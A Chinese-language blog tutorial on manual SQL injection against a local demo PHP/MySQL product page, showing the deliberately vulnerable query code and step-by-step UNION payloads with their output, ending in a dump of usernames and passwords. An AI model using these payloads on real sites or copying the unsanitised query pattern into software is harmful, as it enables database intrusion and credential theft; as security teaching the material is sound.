php mysql手动注入_一个PHP的SQL注入完整过程

最新推荐文章于 2024-04-12 02:56:56 发布
最新推荐文章于 2024-04-12 02:56:56 发布
阅读量303 收藏
点赞数
文章标签: php mysql手动注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39926193/article/details/113474520
版权

本篇文章介绍的内容是一个PHP的SQL注入完整过程,现在分享给大家,有需要的朋友可以参考一下

学了SQL注入的一些技能后,以下正对PHP+MYSQL进行SQL注入的简单实践

首先观察两个MYSQL数据表

用户记录表:REATE TABLE `php_user` (

`id` int(11) NOT NULL auto_increment,

`username` varchar(20) NOT NULL default '',

`password` varchar(20) NOT NULL default '',

`userlevel` char(2) NOT NULL default '0',

PRIMARY KEY (`id`)

) TYPE=MyISAM AUTO_INCREMENT=3 ;

INSERT INTO `php_user` VALUES (1, 'seven', 'seven_pwd', '10');

INSERT INTO `php_user` VALUES (2, 'swons', 'swons_pwd', '');

产品记录列表:CREATE TABLE `php_product` (

`id` int(11) NOT NULL auto_increment,

`name` varchar(100) NOT NULL default '',

`price` float NOT NULL default '0',

`img` varchar(200) NOT NULL default '',

PRIMARY KEY (`id`)

) TYPE=MyISAM AUTO_INCREMENT=3 ;

INSERT INTO `php_product` VALUES (1, 'name_1', 12.2, 'images/name_1.jpg');

INSERT INTO `php_product` VALUES (2, 'name_2', 35.25, 'images/name_2.jpg');

以下文件是show_product.php用于显示产品列表。SQL注入也是利用此文件的SQL语句漏洞<?php

$conn = mysql_connect("localhost", "root", "root");

if(!$conn){

echo "数据库联接错误";

exit;

}

if (!mysql_select_db("phpsql")) {

echo "选择数据库出错" . mysql_error();

exit;

}

$tempID=$_GET['id'];

if($tempID<=0 || !isset($tempID)) $tempID=1;

$sql = "SELECT * FROM php_product WHERE id =$tempID";

echo $sql.'
';

$result = mysql_query($sql);

if (!$result) {

echo "查询出错" . mysql_error();

exit;

}

if (mysql_num_rows($result) == 0) {

echo "没有查询结果";

exit;

}

while ($row = mysql_fetch_assoc($result)) {

echo 'ID:'.$row["id"].'
';

echo 'name:'.$row["name"].'
';

echo 'price:'.$row["price"].'
';

echo 'image:'.$row["img"].'
';

}

?>

观察此语句:$sql = "SELECT * FROM php_product WHERE id =$tempID";

$tempID是从$_GET得到。我们可以构造这个变量的值,从而达到SQL注入的目的

分别构造以下链接:

1、http://localhost/phpsql/index.php?id=1

得到以下输出SELECT * FROM php_product WHERE id =1 //当前执行的SQL语句

//得到ID为1的产品资料列表

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

2、http://localhost/phpsql/index.php?id=1or 1=1

得到输出SELECT * FROM php_product WHERE id =1 or 1=1 //当前执行的SQL语句

//一共两条产品资料列表

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:2

name:name_2

price:35.25

image:images/name_2.jpg

1和2都得到资料列表输出,证明SQL语句执行成功

3、判断数据表字段数量

http://localhost/phpsql/index.php?id=1union select 1,1,1,1

得到输出SELECT * FROM php_product WHERE id =1 union select 1,1,1,1 //当前执行的SQL语句

//一共两条记录,注意第二条的记录为全1,这是union select联合查询的结果。

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:1

name:1

price:1

image:1

4、判断数据表字段类型

http://localhost/phpsql/index.php?id=1union select char(65),char(65),char(65),char(65)

得到输出SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:0

name:A

price:0

image:A

注意第二条记录,如果后面的值等于A,说明这个字段与union查询后面构造的字段类型相符。此时union后面

为char(65),表示字符串类型。经过观察。可以发现name字段和image字段的类型都是字符串类型

5、大功告成,得到我们想要的东西:

http://localhost/phpsql/index.php?id=10000union select 1,username,1,password from php_user

得到输出:

SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user

//输出了两条用户资料,name为用户名称,image为用户密码。

ID:1

name:seven

price:1

image:seven_pwd

ID:1

name:swons

price:1

image:swons_pwd

注意URL中的ID=10000是为了不得到产品资料,只得到后面union的查询结果。更具实际情况ID的值有所不同

union的username和password必须放在2和4的位置上。这样才能和前面的select语句匹配。这是union查询

语句的特点

备注:

这个简单的注入方法是更具特定环境的。实际中比这复杂。但是原理是相同的。

相关推荐:

weixin_39926193
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP SQL注入
qpmglj的专栏
04-23 649
什么是SQL注入SQL注入是一种将SQL代码添加到输入参数中,传递给SQL服务器解析并执行的攻击手段。上个简单案例:这是正常mysql数据库查询语句,下面展示SQL注入的案例:select * from dept where deptno = -1 or 1 =1;这就是所谓的将SQL代码添加到输入参数中,传递给SQL服务器解析并执行,这样就可以得知你的数据库信息。攻击者可以通过SQL代码构造,达...
php sql注入
技术的搬运工
01-16 2236
在应用程序中,为了和用户交互,允许用户提交输入数据,假如应用程序并没有对用户输入数据进行处理,攻击者可以输入一些跟sql语句相关的字符串(一般带有特殊字符)从而让应用程序执行危险的 SQL 操作,导致泄漏机密数据(比如用户信息)或直接修改删除线上的数据。
PHP SQL 注入
百年孤独
07-01 1104
SQL注入详解
热门推荐
行者AI
09-16 1万+
现在大多数系统都使用B/S架构,出于安全考虑需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往会出现安全隐患,为了更好的保护数据泄露或服务器安全,为了方便的安全测试,便编写此文。 1. SQL注入简介 SQL注入就是指Web应用程序对用户输入数据的合理性没有进行判断,前端传入后端的参数是攻击者可控制的,并且根据参数带入数据库查询,攻击者可以通过构造不同的SQL语句来对数据库进行任意查询。下面以PHP语句为例作为展示: query="SE
SQL注入四-PHP应用&amp;SQL二次注入&amp;堆叠执行&amp;DNS带外&amp;功能点&amp;黑白盒条件
最新发布
2401_83739411的博客
04-12 699
#PHP-MYSQL-二次注入-DEMO&74CMS1、DEMO-用户注册登录修改密码2、CMS-74CMS个人中心简历功能黑盒思路:分析功能有添加后对数据操作的地方(功能点)白盒思路:insert后进入select或update的功能的代码块注入条件:插入时有转义函数或配置,后续有利用插入的数据#PHP-MYSQL-堆叠注入-DEMO&CTF强网堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,
meekrodb:MeekroDB-简单PHP MySQL
05-26
一个PHP MySQL库,使您可以用更少的代码行来完成更多工作,并使SQL注入100%成为不可能。 自2013年以来,Google在“ php mysql库”中排名第一,在全球范围内进行了数千次部署。 具有完善的安全记录的图书馆。 ...
PHP中基于MYSQLI类操作MYSQL数据库的实现.pdf
10-10
MYSQLI 类的优点在于,它提供了一个面向对象的编程接口,使开发者可以使用 PHP 语言来操作 MYSQL 数据库,而不需要手动编写 SQL 语句。这使得开发者可以更方便地操作 MYSQL 数据库,并且提高了网站的开发效率和性能...
php+MySQL实现的简易贴吧程序
11-17
这是一个极为简陋的类似贴吧的php程序,也是我做的第一个php程序,运行在LAMP环境下。 鲁棒性奇差,仅属于基本能用的范畴。 使用方法 1、解压放到http目录下,修改权限为755。 2、修改config.php,将数据库host、...
SQL语句 注入猜解hack工具
08-30
本工具是用来进行SQL注入猜解的工具,主要针对一些没有错误返回信息的网站的表结构猜解(当然,如果有错误返回这个工具也适用,只是没必要使用这个工具了,因为有更好更快捷的工具),尤其是Java+Oracle,PHP+MySQL...
PHP框架Kohana v3.3.1.zip
07-07
*所有数据插入到数据库是避免使用数据库特定方法,如mysql_real_escape_string,以防止SQL注入攻击。Kohana里的magicquotes是被关闭的。 *所有POST,GET,和COOKIE数据都经过处理,以防止恶意行为。 更轻量级以最...
PHPSQL注入实现(测试代码安全不错)
10-28
看黑客是如何入侵的,我们写编写php代码的过程中,最好自己先测试效果。
PHPSQL注入代码,PHP 预防CSRF、XSS、SQL注入攻击
云博客_资源宝分享
08-12 2392
1.服务端进行CSRF防御 服务端的CSRF方式方法很多样,但总的思想都是一致的,就是在客户端页面增加伪随机数。 (1).Cookie Hashing(所有表单都包含同一个伪随机值): 这可能是最简单的解决方案了,因为攻击者不能获得第三方的Cookie(理论上),所以表单中的数据也就构造失败了 (2).验证码   这个方案的思路是:每次的用户提交都需要用户在表单中填写一个图片上的随机字符串,厄…这个方案可以完全解决CSRF,但个人觉得在易用性方面似乎不是太好,还有听闻是验证码图片的使用涉及了一个被称为MHT
phpmysqli防注入攻略
我点评的博客
08-01 315
为了防止SQL注入攻击,我们可以使用mysqli类中的prepare语句、mysqli_real_escape_string函数以及正确的数据类型等方法。在使用mysqli_real_escape_string函数时,我们需要将需要转义的字符串作为第一个参数传入函数中。mysqli是PHP中与MySQL交互的扩展,它提供了一种有效的防止SQL注入攻击的方法。mysqli_real_escape_string函数是mysqli扩展中一个非常重要的函数,它可以将特殊字符转义,从而避免SQL注入攻击。
PHP+MySQL注入
Jim的博客
08-15 534
一.访问文件系统 1.读文件 MySQL允许使用load data infile和load_file命令将文本文件读到数据库中。 首先创建一个文本文件users.txt 创建数据表:create table authors (fname char(20), sname char(20), email char(100), flag int); 导入数据库:load data infile
php mysql手动注入_SQL注入系列之PHP+Mysql手动注入(一)----数字型
weixin_39574246的博客
01-20 154
1.常见的几种SQL注入1.数字型2.字符型3.文本型4.搜索型(POST/GET)5.cookie注入6.SQL盲注7.编码注入8.宽字节注入2.测试源码页面源码:sql注入测试body{text-align:center}include"./conn.php";$id=@$_GET['id'];//id未经过滤if($id==null){$id="1";}mysql_query('setn...
php sql 注入例子代码
freshfox的博客
06-23 2777
&lt;?php $servername = "localhost"; $username = "root"; $password = "root"; $conn = mysqli_connect($servername, $username, $password); // 检测连接 if (!$conn) { die("Connection failed: " . mysqli_c...
SQL注入系列之PHP+Mysql手动注入(二)----字符型
fendo
02-25 7050
一、什么是字符型注入以及原理 1)字符型注入简介 字符串或串(String)是由数字、字母、下划线组成的一串字符。一般记为 s=“a1 a2 ···an ” (n>=0)。它是编程语言中表示文本的数据类型。 字符型注入就是把输入的参数当做字符串来对数据库进行查询,字符型注入在sql语句中都采用单引号括起来。 2)基本原理: 看看这条SQL语
一个PHP+Mysql手工注入例子
Praifire的博客
07-16 1万+
说下我的基本思路: 1、目标站点环境为:Windows+Apache+Mysql+PHP 2、存在SQL注入,能否直接写一句话木马 3、存在SQL注入,获取数据库中用户口令,登录应用系统后上传webshell 4、获取数据库口令登录phpMyAdimin,用phpMyAdmin写入一句话木马 不想因为使用扫描工具的缘故,导致服务器出现不稳定的现象,所以就纯手工咯。 下面具体来说明下
SQL注入PHP+Mysql注入
weixin_43670105的博客
06-11 656
SQL注入PHP+Mysql注入 添加链接描述
php一个sql注入漏洞分析工具
02-07
2. 其次,可以使用 PHPmysql_real_escape_string() 函数来对攻击字符串进行转义,以避免注入漏洞的发生。 3. 另外,可以使用 PHP 的 PDO 类来执行 SQL 查询,这样可以使用预处理语句,从而有效地避免 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值